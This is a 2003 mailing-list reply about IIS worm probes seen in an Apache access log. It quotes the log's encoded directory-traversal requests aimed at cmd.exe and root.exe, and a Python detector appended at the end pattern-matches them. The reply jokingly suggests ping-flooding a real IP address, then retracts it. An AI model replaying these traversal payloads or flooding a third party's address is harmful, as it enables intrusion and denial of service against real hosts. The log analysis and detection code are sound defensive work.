Sometimes this isn't automated, but people that type in the IP without
scanning first. If you are on a heavy connection, and ain't scared that your
ISP is gonna shut you down, try with ping -f 65.27.204.81 :-)
Just kidding, don't do it, it probably ain't the true owners of the IP
that do it, they are probably victims themselves :-)


On Wed, 2003-12-31 at 11:18, Aaron Walker wrote:
> A week or so ago, I set up my cable router/firewall to forward port 80 to 
> one of my machines so I could run Apache.  Last night while at work, I 
> checked to see if it worked, and it did.  So just now, I went to check 
> out the access_log and noticed some funny looking stuff that doesn't 
> look like normal activity....
> 
> <snipped from /var/log/apache2/access_log>
> 
> 218.145.25.11 - - [28/Dec/2003:19:40:17 -0500] "GET 
> /scripts/nsiislog.dll HTTP/1.0" 404 286 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:40 -0500] "GET 
> /scripts/root.exe?/c+dir HTTP/1.0" 404 282 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET 
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET 
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET 
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET 
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET 
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
> HTTP/1.0" 404 321 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET 
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
> HTTP/1.0" 404 321 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET 
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
>  
> HTTP/1.0" 404 337 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET 
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET 
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET 
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET 
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET 
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET 
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET 
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 
> "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET 
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
> 221.13.152.198 - - [30/Dec/2003:04:58:50 -0500] "get 
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir"
>  
> 501 336 "-" "-"
> 
> Is this someone trying to exploit Apache?
> 
> Thanks,
> Aaron
-- 
Regards, Redeeman
()  ascii ribbon campaign - against html e-mail 
/\                        - against microsoft attachments
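
The requests in the quoted log can be picked out mechanically. The following is an added example, not code from either poster: it tags access_log requests by repeated percent-decoding, by 0xC0/0xC1 bytes (never valid UTF-8 lead bytes), and by the IIS-only file names that appear in the log. The function names and the 192.0.2.10 line are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Constructed sample: quoted access_log requests (unwrapped) plus one invented benign line.
SAMPLE_LOG = '''\
218.145.25.11 - - [28/Dec/2003:19:40:17 -0500] "GET /scripts/nsiislog.dll HTTP/1.0" 404 286 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294 "-" "-"
221.13.152.198 - - [30/Dec/2003:04:58:50 -0500] "get /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir" 501 336 "-" "-"
192.0.2.10 - - [30/Dec/2003:09:00:00 -0500] "GET /index.html HTTP/1.0" 200 1024 "-" "-"
'''
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ ([^\s"]+)[^"]*" (\d{3}) ')
TARGETS = (b"cmd.exe", b"root.exe", b"nsiislog.dll")  # file names taken from the log

def decode_layers(path, max_rounds=3):
    """Percent-decode until stable; return (bytes, number of rounds that changed it)."""
    data, rounds = path.encode("latin-1"), 0
    while rounds < max_rounds and (nxt := unquote_to_bytes(data)) != data:
        data, rounds = nxt, rounds + 1
    return data, rounds

def classify(path):
    """Tag one request path with the probe traits it shows (empty set = none)."""
    data, rounds = decode_layers(path)
    tags = set()
    if rounds >= 2:                          # e.g. %255c -> %5c -> backslash
        tags.add("double-encoded")
    if b"\xc0" in data or b"\xc1" in data:   # overlong / malformed UTF-8 separator
        tags.add("overlong-utf8")
    if any(t in data.lower() for t in TARGETS):
        tags.add("iis-target")
    return tags

def scan(log_text):
    """Group tagged requests by source IP: request count, traits, status codes."""
    hits = defaultdict(lambda: {"requests": 0, "tags": set(), "statuses": set()})
    for m in filter(None, map(LINE_RE.match, log_text.splitlines())):
        tags = classify(m.group(2))
        if tags:
            entry = hits[m.group(1)]
            entry["requests"] += 1
            entry["tags"] |= tags
            entry["statuses"].add(m.group(3))
    return dict(hits)

if __name__ == "__main__":
    for ip, info in scan(SAMPLE_LOG).items():
        print(ip, info["requests"], sorted(info["tags"]), sorted(info["statuses"]))
```

Every tagged request in the sample was answered with 400, 404 or 501, matching the status codes in the quoted log.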


